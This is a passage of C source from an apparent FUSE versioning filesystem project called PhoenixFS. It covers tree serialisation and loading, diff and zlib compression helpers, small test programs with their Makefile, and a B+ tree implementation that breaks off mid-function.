}
fwrite(&num_keys, sizeof(uint16_t), 1, outfile);
/* Now write the entries */
iter = root;
while (!iter->is_leaf)
iter = iter->pointers[0];
while (1) {
for (i = 0; i < iter->num_keys; i++) {
/* Write the key */
fwrite(&(iter->keys[i]), sizeof(uint16_t), 1, outfile);
vfr = find(root, iter->keys[i], 0);
/* Compute name_len; write name_len and name */
name_len = strlen((const char *) vfr->name);
fwrite(&name_len, sizeof(uint16_t), 1, outfile);
fwrite(vfr->name, name_len * sizeof(unsigned char), 1, outfile);
PHOENIXFS_DBG("dump_vfr_tree:: vfr %s", (const char *) vfr->name);
/* Compute and write rev_nr and HEAD */
if (vfr->HEAD < 0) {
start_rev = 0;
rev_nr = 0;
} else if (vfr->history[(vfr->HEAD + 1) % REV_TRUNCATE]) {
/* History is full, and is probably wrapping around */
start_rev = (vfr->HEAD + 1) % REV_TRUNCATE;
rev_nr = 20;
} else {
/* History is not completely filled */
start_rev = 0;
rev_nr = vfr->HEAD + 1;
}
fwrite(&rev_nr, sizeof(uint8_t), 1, outfile);
/* Write the actual file records in chronological order */
dump_frs(vfr, start_rev, rev_nr, outfile);
}
if (iter->pointers && iter->pointers[BTREE_ORDER - 1] != NULL)
iter = iter->pointers[BTREE_ORDER - 1];
else
break;
}
destroy_tree(root);
}
/**
* Format:
* <> :=
* num_keys | [key | name_len | name | [<dump_vfr>][...]][...]
*/
void dump_dr_tree(struct node *root, FILE *outfile)
{
struct dir_record *dr;
uint16_t name_len;
int num_keys = 0;
int i = 0;
node *iter;
if (!(iter = root)) {
/* Write num_keys = 0 */
fwrite(&i, sizeof(uint16_t), 1, outfile);
return;
}
/* First compute and write the number of keys */
while (!iter->is_leaf)
iter = iter->pointers[0];
while (1) {
for (i = 0; i < iter->num_keys; i++)
num_keys++;
if (iter->pointers && iter->pointers[BTREE_ORDER - 1] != NULL)
iter = iter->pointers[BTREE_ORDER - 1];
else
break;
}
fwrite(&num_keys, sizeof(uint16_t), 1, outfile);
/* Now write the entries */
iter = root;
while (!iter->is_leaf)
iter = iter->pointers[0];
while (1) {
for (i = 0; i < iter->num_keys; i++) {
/* Write the key */
fwrite(&(iter->keys[i]), sizeof(uint16_t), 1, outfile);
dr = find(root, iter->keys[i], 0);
/* Compute name_len; write name_len and name */
name_len = strlen((const char *) dr->name);
fwrite(&name_len, sizeof(uint16_t), 1, outfile);
fwrite(dr->name, name_len * sizeof(unsigned char), 1, outfile);
PHOENIXFS_DBG("dump_dr_tree:: %s", (const char *) dr->name);
dump_vfr_tree(dr->vroot, outfile);
}
if (iter->pointers && iter->pointers[BTREE_ORDER - 1] != NULL)
iter = iter->pointers[BTREE_ORDER - 1];
else
break;
}
destroy_tree(root);
}
/* --------------
* The load part
* --------------
*/
/**
* Format:
* <> :=
* num_keys | [key | name_len | name | rev_nr | [<load_frs>][...]][...]
*/
struct node *load_vfr_tree(FILE *infile)
{
struct node *root;
struct vfile_record *vfr;
uint16_t key;
uint16_t num_keys;
uint16_t name_len;
uint8_t rev_nr;
register int i, j;
root = NULL;
memset(&num_keys, 0, sizeof(uint16_t));
if (fread(&num_keys, sizeof(uint16_t), 1, infile) < 1)
die("Read error: num_keys");
for (i = 0; i < num_keys; i++) {
memset(&key, 0, sizeof(uint16_t));
if (fread(&key, sizeof(uint16_t), 1, infile) < 1)
die("Read error: key");
memset(&name_len, 0, sizeof(uint16_t));
if (fread(&name_len, sizeof(uint16_t), 1, infile) < 1)
die("Read error: name_len");
memset(&path_buf, 0, PATH_MAX);
if (fread(&path_buf, name_len * sizeof(unsigned char), 1, infile) < 1)
die("Read error: path_buf");
memset(&rev_nr, 0, sizeof(uint8_t));
if (fread(&rev_nr, sizeof(uint8_t), 1, infile) < 1)
die("Read error: rev_nr");
vfr = make_vfr((const char *) path_buf);
root = insert(root, key, (void *) vfr);
for (j = 0; j < rev_nr; j++) {
vfr->history[j] = malloc(sizeof(struct file_record));
memset(vfr->history[j], 0, sizeof(struct file_record));
if (fread(vfr->history[j], sizeof(struct file_record),
1, infile) < 1)
die("Read error: vfr->history[%d]", j);
PHOENIXFS_DBG("load_vfr_tree:: %s [%d]", vfr->name, j);
}
vfr->HEAD = rev_nr - 1;
}
return root;
}
/**
* Format:
* <> :=
* num_keys | [key | name_len | name | [<load_vfr>][...]][...]
*/
struct node *load_dr_tree(FILE *infile)
{
struct node *root;
struct dir_record *dr;
uint16_t key;
uint16_t num_keys;
uint16_t name_len;
register int i;
root = NULL;
memset(&num_keys, 0, sizeof(uint16_t));
if (fread(&num_keys, sizeof(uint16_t), 1, infile) < 1)
die("Read error: num_keys");
for (i = 0; i < num_keys; i++) {
memset(&key, 0, sizeof(uint16_t));
if (fread(&key, sizeof(uint16_t), 1, infile) < 1)
die("Read error: key");
memset(&name_len, 0, sizeof(uint16_t));
if (fread(&name_len, sizeof(uint16_t), 1, infile) < 1)
die("Read error: name_len");
memset(&path_buf, 0, PATH_MAX);
if (fread(&path_buf, name_len * sizeof(unsigned char), 1, infile) < 1)
die("Read error: path_buf");
PHOENIXFS_DBG("load_dr_tree:: %s", (const char *) path_buf);
dr = make_dr((const char *) path_buf);
root = insert(root, key, (void *) dr);
dr->vroot = load_vfr_tree(infile);
}
return root;
}
<|start_filename|>diff.c<|end_filename|>
#include "diff.h"
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/stat.h>
static int load_mmfile(mmfile_t *mf_ptr, FILE *file, size_t sz)
{
if (!(mf_ptr->ptr = malloc(sz)))
return -errno;
if (fread(mf_ptr->ptr, sz, 1, file) < 1)
return -errno;
mf_ptr->size = sz;
return 0;
}
static int write_diff(void *file, mmbuffer_t *mb, int nbuf)
{
int i;
for (i = 0; i < nbuf; i++)
fprintf((FILE *) file, "%.*s", (int) mb[i].size, mb[i].ptr);
return 0;
}
int phoenixfs_diff(FILE* file1, size_t sz1, FILE* file2, size_t sz2, FILE* outfile)
{
int ret;
xdemitcb_t ecb;
xpparam_t xpp;
xdemitconf_t xecfg;
mmfile_t mf1, mf2;
if ((ret = load_mmfile(&mf1, file1, sz1)) < 0)
return ret;
if ((ret = load_mmfile(&mf2, file2, sz2) < 0))
return ret;
memset(&xpp, 0, sizeof(xpp));
xpp.flags = 0;
memset(&xecfg, 0, sizeof(xecfg));
xecfg.ctxlen = 3;
ecb.outf = write_diff;
ecb.priv = outfile ? (void *) outfile : (void *) stdout;
xdl_diff(&mf1, &mf2, &xpp, &xecfg, &ecb);
free(mf1.ptr);
free(mf2.ptr);
return 0;
}
<|start_filename|>t/test-crc32.c<|end_filename|>
#include "crc32.h"
#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
int main(int argc, char *argv[])
{
uint32_t crc = ~0;
unsigned char *data;
size_t length;
if (argc < 2)
die("Usage: %s <input string>", argv[0]);
length = strlen(argv[1]);
data = (unsigned char *) argv[1];
printf("%08X\n", compute_crc32(crc, data, length));
return 0;
}
<|start_filename|>sha1.h<|end_filename|>
#ifndef SHA1_H_
#define SHA1_H_
#include <stdio.h>
#include "common.h"
#include "block-sha1/sha1.h"
#define SHA1_CTX blk_SHA_CTX
#define SHA1_Init blk_SHA1_Init
#define SHA1_Update blk_SHA1_Update
#define SHA1_Final blk_SHA1_Final
int sha1_file(FILE *infile, size_t size, unsigned char *sha1);
void print_sha1(char *dst, const unsigned char *sha1);
int get_sha1_hex(const char *hex, unsigned char *sha1);
#endif
<|start_filename|>t/test-delta.c<|end_filename|>
#include "delta.h"
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <sys/stat.h>
int main(int argc, char* argv[])
{
void *buf1, *buf2, *result_buf;
unsigned long result_size;
FILE *fh1, *fh2;
struct stat st1, st2;
buf1 = NULL;
buf2 = NULL;
result_buf = NULL;
if (argc < 4)
die("Usage: %s <c|a> <filename> <filename|delta>", argv[0]);
if (!(fh1 = fopen(argv[2], "rb")) ||
(lstat(argv[2], &st1) < 0) ||
!(buf1 = malloc(st1.st_size)))
return -errno;
fread(buf1, st1.st_size, 1, fh1);
if (!(fh2 = fopen(argv[3], "rb")) ||
(lstat(argv[3], &st2) < 0) ||
!(buf2 = malloc(st2.st_size)))
return -errno;
fread(buf2, st2.st_size, 1, fh2);
if (!strcmp(argv[1], "c"))
result_buf = diff_delta(buf1, st1.st_size, buf2,
st2.st_size, &result_size, 0);
else if (!strcmp(argv[1], "a"))
result_buf = patch_delta(buf1, st1.st_size, buf2,
st2.st_size, &result_size);
else
die("Usage: %s <c|a> <filename> <filename|delta>", argv[0]);
fwrite(result_buf, result_size, 1, stdout);
free(buf1);
free(buf2);
free(result_buf);
fclose(fh1);
fclose(fh2);
return 0;
}
<|start_filename|>common.c<|end_filename|>
#include <stdio.h>
#include <stdarg.h>
#include <stdlib.h>
static void vreportf(const char *fmt, va_list params)
{
char msg[4096];
vsnprintf(msg, sizeof(msg), fmt, params);
fprintf(stderr, "%s\n", msg);
}
void die(const char *fmt, ...)
{
va_list params;
va_start(params, fmt);
vreportf(fmt, params);
va_end(params);
exit(128);
}
<|start_filename|>compress.c<|end_filename|>
#include "compress.h"
#include <zlib.h>
#include <stdio.h>
int zdeflate(FILE *source, FILE *dest, int level)
{
int ret, flush;
unsigned int have;
z_stream stream;
unsigned char in[CHUNK];
unsigned char out[CHUNK];
stream.zalloc = Z_NULL;
stream.zfree = Z_NULL;
stream.opaque = Z_NULL;
if ((ret = deflateInit(&stream, level)) != Z_OK)
return ret;
do {
stream.avail_in = fread(in, 1, CHUNK, source);
if (ferror(source)) {
deflateEnd(&stream);
return Z_ERRNO;
}
flush = feof(source) ? Z_FINISH : Z_NO_FLUSH;
stream.next_in = in;
do {
stream.avail_out = CHUNK;
stream.next_out = out;
ret = deflate(&stream, flush);
have = CHUNK - stream.avail_out;
if (fwrite(out, 1, have, dest) != have || ferror(dest)) {
deflateEnd(&stream);
return Z_ERRNO;
}
} while (!stream.avail_out);
} while (flush != Z_FINISH);
deflateEnd(&stream);
return Z_OK;
}
int zinflate(FILE *source, FILE *dest)
{
int ret;
unsigned int have;
z_stream stream;
unsigned char in[CHUNK];
unsigned char out[CHUNK];
stream.zalloc = Z_NULL;
stream.zfree = Z_NULL;
stream.opaque = Z_NULL;
stream.avail_in = 0;
stream.next_in = Z_NULL;
if ((ret = inflateInit(&stream)) != Z_OK)
return ret;
do {
stream.avail_in = fread(in, 1, CHUNK, source);
if (ferror(source)) {
inflateEnd(&stream);
return Z_ERRNO;
}
if (!stream.avail_in)
break;
stream.next_in = in;
do {
stream.avail_out = CHUNK;
stream.next_out = out;
ret = inflate(&stream, Z_NO_FLUSH);
switch (ret) {
case Z_NEED_DICT:
ret = Z_DATA_ERROR;
case Z_DATA_ERROR:
case Z_MEM_ERROR:
inflateEnd(&stream);
return ret;
}
have = CHUNK - stream.avail_out;
if (fwrite(out, 1, have, dest) != have || ferror(dest)) {
inflateEnd(&stream);
return Z_ERRNO;
}
} while (!stream.avail_out);
} while (ret != Z_STREAM_END);
inflateEnd(&stream);
return ret == Z_STREAM_END ? Z_OK : Z_DATA_ERROR;
}
<|start_filename|>fstree.h<|end_filename|>
#ifndef FSTREE_H_
#define FSTREE_H_
#define FUSE_USE_VERSION 26
#define _XOPEN_SOURCE 500
#define PHOENIXFS_MAGIC 0x2888
#include "common.h"
#include "btree.h"
#include "crc32.h"
#include "sha1.h"
#include "persist.h"
#include "pack.h"
#include <sys/stat.h>
struct env_t {
char fsback[PATH_MAX];
char mountpoint[PATH_MAX];
};
int parse_pathspec(char *xpath, const char *path);
int build_xpath(char *xpath, const char *path, int rev);
char *split_basename(const char *path, char *dirname);
void fill_stat(struct stat *st, struct file_record *fr);
struct node *get_fsroot(void);
struct dir_record *find_dr(const char *path);
struct vfile_record *find_vfr(const char *path);
struct file_record *find_fr(const char *path, int rev);
struct dir_record *make_dr(const char *path);
struct vfile_record *make_vfr(const char *name);
struct file_record *make_fr(const char *path, const char *follow);
void insert_dr(struct dir_record *dr);
void insert_vfr(struct dir_record *dr, struct vfile_record *vfr);
void insert_fr(struct vfile_record *vfr, struct file_record *fr);
struct node *remove_entry(struct node *root, uint16_t key);
void fstree_insert_update_file(const char *path, const char *follow);
void fstree_remove_file(const char *path);
void fstree_dump_tree(FILE *outfile);
void fstree_load_tree(FILE *infile);
void print_fstree(void);
#define ROOTENV ((struct env_t *) fuse_get_context()->private_data)
#endif
<|start_filename|>t/Makefile<|end_filename|>
CC = gcc
RM = rm -f
MV = mv
XDIFF_LIB=../xdiff/lib.a
SHA1_LIB=../block-sha1/lib.a
BUILD_OBJS =
BUILD_OBJS += test-pack.o
BUILD_OBJS += test-diff.o
BUILD_OBJS += test-sha1.o
BUILD_OBJS += test-btree.o
BUILD_OBJS += test-crc32.o
BUILD_OBJS += test-compress.o
BUILD_OBJS += test-delta.o
ALL_TARGETS =
ALL_TARGETS += test-pack
ALL_TARGETS += test-diff
ALL_TARGETS += test-sha1
ALL_TARGETS += test-btree
ALL_TARGETS += test-crc32
ALL_TARGETS += test-compress
ALL_TARGETS += test-delta
CFLAGS = -g -O2 -Wall $(shell pkg-config fuse --cflags) $(shell pkg-config zlib --cflags)
LDFLAGS = $(shell pkg-config fuse --libs) $(shell pkg-config zlib --libs)
ALL_CFLAGS = $(CFLAGS)
ALL_LDFLAGS = $(LDFLAGS)
ALL_LIBS = $(XDIFF_LIB) $(SHA1_LIB)
QUIET_SUBDIR0 = +$(MAKE) -C # space to separate -C and subdir
QUIET_SUBDIR1 =
ifneq ($(findstring $(MAKEFLAGS),w),w)
PRINT_DIR = --no-print-directory
else # "make -w"
NO_SUBDIR = :
endif
ifneq ($(findstring $(MAKEFLAGS),s),s)
ifndef V
QUIET_CC = @echo ' ' CC $@;
QUIET_LINK = @echo ' ' LINK $@;
QUIET_SUBDIR0 = +@subdir=
QUIET_SUBDIR1 = ;$(NO_SUBDIR) echo ' ' SUBDIR $$subdir; \
$(MAKE) $(PRINT_DIR) -C $$subdir
endif
endif
XDIFF_OBJS = ../xdiff/xdiffi.o ../xdiff/xprepare.o ../xdiff/xutils.o \
../xdiff/xemit.o ../xdiff/xmerge.o ../xdiff/xpatience.o
SHA1_OBJS = ../block-sha1/sha1.o
all:: $(ALL_TARGETS)
test-%.o: test-%.c ../%.c ../common.c
$(QUIET_CC)$(CC) -I../ -o test-$*.o -c $(ALL_CFLAGS) $<
test-pack$X: test-pack.o ../pack.o ../loose.o ../sha1.o ../buffer.o ../common.o $(SHA1_LIB)
$(QUIET_LINK)$(CC) -I../ $(ALL_CFLAGS) -o $@ test-pack.o \
../pack.o ../loose.o ../sha1.o ../buffer.o ../common.o \
$(ALL_LDFLAGS) $(SHA1_LIB)
test-diff$X: test-diff.o ../diff.o ../common.o $(XDIFF_LIB)
$(QUIET_LINK)$(CC) -I../ $(ALL_CFLAGS) -o $@ test-diff.o \
../diff.o ../common.o \
$(ALL_LDFLAGS) $(XDIFF_LIB)
test-sha1$X: test-sha1.o ../sha1.o ../common.o $(SHA1_LIB)
$(QUIET_LINK)$(CC) -I../ $(ALL_CFLAGS) -o $@ test-sha1.o \
../sha1.o ../common.o \
$(ALL_LDFLAGS) $(SHA1_LIB)
test-btree$X: test-btree.o ../btree.o ../common.o
$(QUIET_LINK)$(CC) -I../ $(ALL_CFLAGS) -o $@ test-btree.o \
../btree.o ../common.o \
$(ALL_LDFLAGS)
test-crc32$X: test-crc32.o ../crc32.o ../common.o
$(QUIET_LINK)$(CC) -I../ $(ALL_CFLAGS) -o $@ test-crc32.o \
../crc32.o ../common.o \
$(ALL_LDFLAGS)
test-compress$X: test-compress.o ../compress.o ../common.o
$(QUIET_LINK)$(CC) -I../ $(ALL_CFLAGS) -o $@ test-compress.o \
../compress.o ../common.o \
$(ALL_LDFLAGS)
test-delta$X: test-delta.o ../delta.o ../common.o
$(QUIET_LINK)$(CC) -I../ $(ALL_CFLAGS) -o $@ test-delta.o \
../delta.o ../common.o \
$(ALL_LDFLAGS)
$(XDIFF_LIB): $(XDIFF_OBJS)
$(QUIET_AR)$(RM) $@ && $(AR) rcs $@ $(XDIFF_OBJS)
$(SHA1_LIB): $(SHA1_OBJS)
$(QUIET_AR)$(RM) $@ && $(AR) rcs $@ $(SHA1_OBJS)
clean:
$(RM) $(ALL_TARGETS) $(BUILD_OBJS) $<
.PHONY: all clean FORCE
<|start_filename|>t/test-btree.c<|end_filename|>
#include "btree.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <limits.h>
int main (int argc, char **argv)
{
char *input_file;
FILE *fp;
node *root;
int input;
char instruction;
bool verbose_output = true;
struct dir_record *dr;
char path[PATH_MAX];
root = NULL;
if (argc > 2) {
input_file = argv[2];
fp = fopen(input_file, "r");
if (fp == NULL) {
perror("Failure to open input file.");
exit(-1);
}
while (!feof(fp)) {
fscanf(fp, "%d %s\n", &input, path);
dr = malloc(sizeof(struct dir_record));
memcpy(dr->name, path, strlen(path));
root = insert(root, input, dr);
}
fclose(fp);
print_tree(root);
}
printf("> ");
while (scanf("%c", &instruction) != EOF) {
switch (instruction) {
case 'd':
scanf("%d", &input);
root = delete(root, input);
print_tree(root);
break;
case 'i':
scanf("%d %s", &input, path);
dr = malloc(sizeof(struct dir_record));
memcpy(dr->name, path, strlen(path));
root = insert(root, input, dr);
print_tree(root);
break;
case 'f':
case 'p':
scanf("%d", &input);
dr = find(root, input, instruction == 'p');
if (dr == NULL)
printf("Record not found under key %d.\n", input);
else
printf("Record at %lx -- key %d, value %s.\n",
(unsigned long)dr, input, dr->name);
break;
case 'l':
print_leaves(root);
break;
case 'q':
while (getchar() != (int)'\n');
return EXIT_SUCCESS;
case 't':
print_tree(root);
break;
case 'v':
verbose_output = !verbose_output;
break;
case 'x':
destroy_tree(root);
print_tree(NULL);
break;
default:
usage_2();
break;
}
while (getchar() != (int)'\n');
printf("> ");
}
printf("\n");
return 0;
}
<|start_filename|>btree.c<|end_filename|>
#include "btree.h"
/*
*
* bpt: B+ Tree Implementation
* Copyright (C) 2010 <NAME> http://www.amittai.com
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
*
* Author: <NAME>
* http://www.amittai.com
* <EMAIL> or <EMAIL>
* Department of Computer Science
* Yale University
* P. O. Box 208285
* New Haven, CT 06520-8285
* Date: 26 June 2010
* Last modified: 28 February 2011
*
* This implementation demonstrates the B+ tree data structure
* for educational purposes, includin insertion, deletion, search, and display
* of the search path, the leaves, or the whole tree.
*
* Must be compiled with a C99-compliant C compiler such as the latest GCC.
*
* Usage: bpt [order]
* where order is an optional argument (integer 3 <= order <= 20)
* defined as the maximal number of pointers in any node.
*
*/
// Uncomment the line below if you are compiling on Windows.
// #define WINDOWS
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// GLOBALS.
/*The order determines the maximum and minimum
*number of entries (keys and pointers) in any
*node. Every node has at most order - 1 keys and
*at least (roughly speaking) half that number.
*Every leaf has as many pointers to data as keys,
*and every internal node has one more pointer
*to a subtree than the number of keys.
*This global variable is initialized to the
*default value.
*/
int order = BTREE_ORDER;
/*The queue is used to print the tree in
*level order, starting from the root
*printing each entire rank on a separate
*line, finishing with the leaves.
*/
node *queue = NULL;
/*The user can toggle on and off the "verbose"
*property, which causes the pointer addresses
*to be printed out in hexadecimal notation
*next to their corresponding keys.
*/
bool verbose_output = false;
// FUNCTION DEFINITIONS.
// OUTPUT AND UTILITIES
/*First message to the user.
*/
void usage_1(void)
{
printf("B+ Tree of Order %d.\n", order);
printf("Following Silberschatz, Korth, Sidarshan, Database Concepts, 5th ed.\n\n");
printf("To build a B+ tree of a different order, start again and enter the order\n");
printf("as an integer argument: bpt <order> ");
printf("(3 <= order <=20).\n");
printf("To start with input from a file of newline-delimited integers, \n"
"start again and enter ");
printf("the order followed by the filename:\n"
"bpt <order> <inputfile> .\n");
}
/*Second message to the user.
*/
void usage_2(void)
{
printf("Enter any of the following commands after the prompt > :\n");
printf("\ti <k> -- Insert <k> (an integer) as both key and value).\n");
printf("\tf <k> -- Find the value under key <k>.\n");
printf("\tp <k> -- Print the path from the root to key k and its associated value.\n");
printf("\td <k> -- Delete key <k> and its associated value.\n");
printf("\tx -- Destroy the whole tree. Start again with an empty tree of the same order.\n");
printf("\tt -- Print the B+ tree.\n");
printf("\tl -- Print the keys of the leaves (bottom row of the tree).\n");
printf("\tv -- Toggle output of pointer addresses (\"verbose\") in tree and leaves.\n");
printf("\tq -- Quit. (Or use Ctl-D.)\n");
printf("\t? -- Print this help message.\n");
}
/*Helper function for printing the
*tree out. See print_tree.
*/
void enqueue(node *new_node)
{
node *c;
if (queue == NULL) {
queue = new_node;
queue->next = NULL;
}
else {
c = queue;
while(c->next != NULL) {
c = c->next;
}
c->next = new_node;
new_node->next = NULL;
}
}
/*Helper function for printing the
*tree out. See print_tree.
*/
node *dequeue(void)
{
node *n = queue;
queue = queue->next;
n->next = NULL;
return n;
}
/*Prints the bottom row of keys
*of the tree (with their respective
*pointers, if the verbose_output flag is set.
*/
void print_leaves(node *root)
{
int i;
node *c = root;
if (root == NULL) {
printf("Empty tree.\n");
return;
}
while (!c->is_leaf)
c = c->pointers[0];
while (true) {
for (i = 0; i < c->num_keys; i++) {
if (verbose_output)
printf("%lx ", (unsigned long)c->pointers[i]);
printf("%d ", c->keys[i]);
}
if (verbose_output)
printf("%lx ", (unsigned long)c->pointers[order - 1]);
if (c->pointers[order - 1] != NULL) {
printf(" | ");
c = c->pointers[order - 1];
}
else
break;
}
printf("\n");
}
/*Utility function to give the height
*of the tree, which length in number of edges
*of the path from the root to any leaf.
*/
int height(node *root)
{
int h = 0;
node *c = root;
while (!c->is_leaf) {
c = c->pointers[0];
h++;
}
return h;
}
/*Utility function to give the length in edges
*of the path from any node to the root.
*/
int path_to_root(node *root, node *child)
{
int length = 0;
node *c = child;
while (c != root) {
c = c->parent;
length++;
}
return length;
}
/*Prints the B+ tree in the command
*line in level (rank) order, with the
*keys in each node and the '|' symbol
*to separate nodes.
*With the verbose_output flag set.
*the values of the pointers corresponding
*to the keys also appear next to their respective
*keys, in hexadecimal notation.
*/
void print_tree(node *root)
{
node *n = NULL;
int i = 0;
int rank = 0;
int new_rank = 0;
if (root == NULL) {
printf("Empty tree.\n");
return;
}
queue = NULL;
enqueue(root);
while (queue != NULL) {
n = dequeue();
if (n->parent != NULL && n == n->parent->pointers[0]) {
new_rank = path_to_root (root, n);
if (new_rank != rank) {
rank = new_rank;
printf("\n");
}
}
if (verbose_output)
printf("(%lx)", (unsigned long)n);
for (i = 0; i < n->num_keys; i++) {
if (verbose_output)
printf("%lx ", (unsigned long)n->pointers[i]);
printf("%d ", n->keys[i]);
}
if (!n->is_leaf)
for (i = 0; i <= n->num_keys; i++)
enqueue(n->pointers[i]);
if (verbose_output) {
if (n->is_leaf)
printf("%lx ", (unsigned long)n->pointers[order - 1]);
else
printf("%lx ", (unsigned long)n->pointers[n->num_keys]);
}
printf("| ");
}
printf("\n");
}
/*Traces the path from the root to a leaf, searching
*by key. Displays information about the path
*if the verbose flag is set.
*Returns the leaf containing the given key.
*/
node *find_leaf(node *root, uint16_t key, bool verbose)
{
int i = 0;
node *c = root;
if (c == NULL) {
if (verbose)
printf("Empty tree.\n");
return c;
}
while (!c->is_leaf) {
if (verbose) {
printf("[");
for (i = 0; i < c->num_keys - 1; i++)
printf("%d ", c->keys[i]);
printf("%d] ", c->keys[i]);
}
i = 0;
while (i < c->num_keys) {
if (key >= c->keys[i]) i++;
else break;
}
if (verbose)
printf("%d ->\n", i);
c = (node *)c->pointers[i];
}
if (verbose) {
printf("Leaf [");
for (i = 0; i < c->num_keys - 1; i++)
printf("%d ", c->keys[i]);
printf("%d] ->\n", c->keys[i]);
}
return c;
}
/*Finds and returns the record to which
*a key refers.
*/
void *find(node *root, uint16_t key, bool verbose)
{
int i = 0;
node *c = find_leaf (root, key, verbose);
if (c == NULL) return NULL;
for (i = 0; i < c->num_keys; i++)
if (c->keys[i] == key) break;
if (i == c->num_keys)
return NULL;
else
return c->pointers[i];
}
/*Finds the appropriate place to
*split a node that is too big into two.
*/
int cut(int length)
{
if (length % 2 == 0)
return length/2;
else
return length/2 + 1;
}
// INSERTION
/*Creates a new general node, which can be adapted
*to serve as either a leaf or an internal node.
*/
node *make_node(void)
{
node *new_node;
new_node = malloc(sizeof(node));
memset(new_node, 0, sizeof(node));
if (new_node == NULL) {
perror("Node creation.");
exit(EXIT_FAILURE);
}
new_node->keys = malloc ((order - 1) * sizeof(uint16_t));
if (new_node->keys == NULL) {
perror("New node keys array.");
exit(EXIT_FAILURE);
}
new_node->pointers = malloc (order * sizeof(void *));
if (new_node->pointers == NULL) {
perror("New node pointers array.");
exit(EXIT_FAILURE);
}
new_node->is_leaf = false;
new_node->num_keys = 0;
new_node->parent = NULL;
new_node->next = NULL;
return new_node;
}
/*Creates a new leaf by creating a node
*and then adapting it appropriately.
*/
node *make_leaf(void)
{
node *leaf = make_node();
leaf->is_leaf = true;
return leaf;
}
/*Helper function used in insert_into_parent
*to find the index of the parent's pointer to
*the node to the left of the key to be inserted.
*/
int get_left_index(node *parent, node *left)
{
int left_index = 0;
while (left_index <= parent->num_keys &&
parent->pointers[left_index] != left)
left_index++;
return left_index;
}
/*Inserts a new pointer to a record and its corresponding
*key into a leaf.
*Returns the altered leaf.
*/
node *insert_into_leaf(node *leaf, uint16_t key, struct dir_record *pointer)
{
int i, insertion_point;
insertion_point = 0;
while (insertion_point < leaf->num_keys && leaf->keys[insertion_point] < key)
insertion_point++;
for (i = leaf->num_keys; i > insertion_point; i--) {
leaf->keys[i] = leaf->keys[i - 1];
leaf->pointers[i] = leaf->pointers[i - 1];
}
leaf->keys[insertion_point] = key;
leaf->pointers[insertion_point] = pointer;
leaf->num_keys++;
return leaf;
}
/*Inserts a new key and pointer
*to a new record into a leaf so as to exceed
*the tree's order, causing the leaf to be split
*in half.
*/
node *insert_into_leaf_after_splitting(node *root, node *leaf,
uint16_t key, struct dir_record *pointer)
{
node *new_leaf;
uint16_t *temp_keys;
void **temp_pointers;
int insertion_index, split;
uint16_t new_key;
register int i, j;
new_leaf = make_leaf();
temp_keys = malloc (order * sizeof(uint16_t));
if (temp_keys == NULL) {
perror("Temporary keys array.");
exit(EXIT_FAILURE);
}
temp_pointers = malloc (order *sizeof(void *));
if (temp_pointers == NULL) {
perror("Temporary pointers array.");
exit(EXIT_FAILURE);
}
insertion_index = 0;
while (insertion_index < order - 1 && leaf->keys[insertion_index] < key)
insertion_index++;
for (i = 0, j = 0; i < leaf->num_keys; i++, j++) {
if (j == insertion_index) j++;
temp_keys[j] = leaf->keys[i];
temp_pointers[j] = leaf->pointers[i];
}
temp_keys[insertion_index] = key;
temp_pointers[insertion_index] = pointer;
leaf->num_keys = 0;
split = cut(order - 1);
for (i = 0; i < split; i++) {
leaf->pointers[i] = temp_pointers[i];
leaf->keys[i] = temp_keys[i];
leaf->num_keys++;
}
for (i = split, j = 0; i < order; i++, j++) {
new_leaf->pointers[j] = temp_pointers[i];
new_leaf->keys[j] = temp_keys[i];
new_leaf->num_keys++;
}
free(temp_pointers);
free(temp_keys);
new_leaf->pointers[order - 1] = leaf->pointers[order - 1];
leaf->pointers[order - 1] = new_leaf;
for (i = leaf->num_keys; i < order - 1; i++)
leaf->pointers[i] = NULL;
for (i = new_leaf->num_keys; i < order - 1; i++)
new_leaf->pointers[i] = NULL;
new_leaf->parent = leaf->parent;
new_key = new_leaf->keys[0];
return insert_into_parent(root, leaf, new_key, new_leaf);
}
/*Inserts a new key and pointer to a node
*into a node into which these can fit
*without violating the B+ tree properties.
*/
node *insert_into_node(node *root, node *n,
int left_index, uint16_t key, node *right)
{
register int i;
for (i = n->num_keys; i > left_index; i--) {
n->pointers[i + 1] = n->pointers[i];
n->keys[i] = n->keys[i - 1];
}
n->pointers[left_index + 1] = right;
n->keys[left_index] = key;
n->num_keys++;
return root;
}
/*Inserts a new key and pointer to a node
*into a node, causing the node's size to exceed
*the order, and causing the node to split into two.
*/
node *insert_into_node_after_splitting(node *root, node *old_node, int left_index,
uint16_t key, node *right)
{
int split, k_prime;
node *new_node, *child;
uint16_t *temp_keys;
node **temp_pointers;
register int i, j;
/*First create a temporary set of keys and pointers
*to hold everything in order, including
*the new key and pointer, inserted in their
*correct places.
*Then create a new node and copy half of the
*keys and pointers to the old node and
*the other half to the new.
*/
temp_pointers = malloc ((order + 1) *sizeof(node *));
if (temp_pointers == NULL) {
perror("Temporary pointers array for splitting nodes.");
exit(EXIT_FAILURE);
}
temp_keys = malloc (order *sizeof(uint16_t));
if (temp_keys == NULL) {
perror("Temporary keys array for splitting nodes.");
exit(EXIT_FAILURE);
}
for (i = 0, j = 0; i < old_node->num_keys + 1; i++, j++) {
if (j == left_index + 1) j++;
temp_pointers[j] = old_node->pointers[i];
}
for (i = 0, j = 0; i < old_node->num_keys; i++, j++) {
if (j == left_index) j++;
temp_keys[j] = old_node->keys[i];
}
temp_pointers[left_index + 1] = right;
temp_keys[left_index] = key;
/*Create the new node and copy
*half the keys and pointers to the
*old and half to the new.
*/
split = cut(order);
new_node = make_node();
old_node->num_keys = 0;
for (i = 0; i < split - 1; i++) {
old_node->pointers[i] = temp_pointers[i];
old_node->keys[i] = temp_keys[i];
old_node->num_keys++;
}
old_node->pointers[i] = temp_pointers[i];
k_prime = temp_keys[split - 1];
